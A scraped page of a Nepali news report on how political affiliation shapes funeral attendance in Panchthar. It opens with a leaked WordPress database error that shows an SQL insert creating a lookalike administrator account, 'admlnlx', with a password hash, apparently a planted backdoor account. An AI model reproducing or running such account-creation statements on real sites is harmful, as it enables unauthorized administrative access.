WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNPvbq14jJjO.EiJXBuS/OYnKwwLc71', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 15:43:17', '', 'admlnlx', 'admlnlx')
काठमाडौं माघ, १० –
राजनीतिक आस्थाका आधारमा कुनै पनि मौकाको फाइदा उठाउनु नेपाली समाजमा नौलो कुरा होइन । तर, पछिल्लो समयमा मृत शरीरको अन्त्येष्टिमा सहभागी हुने मालामीमा समेत राजनीतिक आस्थाको आधारमा सहभागी हुनेहरुको संख्या बढेको छ ।
नेपाली कांग्रेसका पाँचथर जिल्ला सदस्य पूर्णकुमार आङ्देम्बेका भिनाजु तथा चिलिङदिनका नपाली कांग्रेसका नेपाली कांग्रेसका सदस्य राजेन्द्रकुमार चेम्जोङको फिदिमको हावा खोलामा दाहसंस्कार भयो । उनको मलामीको संख्या एकदमै कम थिए । तर केही आफन्तबाहेक पाँचथर कांग्रेसका शीर्ष नेता र कार्यकर्ता सहभागी थिए ।
नागिन १, खमारेका युवक लेखनाथ मिश्रको मंगलबार हावाखोलामै दाहसंस्कार भयो । उनको अन्त्येष्टिमा मलामीकै अभाव भयो । उनको अन्त्येष्टिमा कुनै पनि राजनीतिक दलसँगनिकट मान्छे मलामी गएनन् । आजको अन्नपूर्ण पोस्ट् दैनिकमा समाचार छ ।
यो त उदाहरण मात्रै हो । यहाँ कुनै पनि राजनीतिक दलका नेता तथा कार्यकर्ताको अन्येष्टिमा दलका अरु नेता तथा कार्यकर्ताको लर्को लाग्छ । तर राजनीति नगर्नेहरुकोमा भने मलामीकै अभाव हुने गरेको छ ।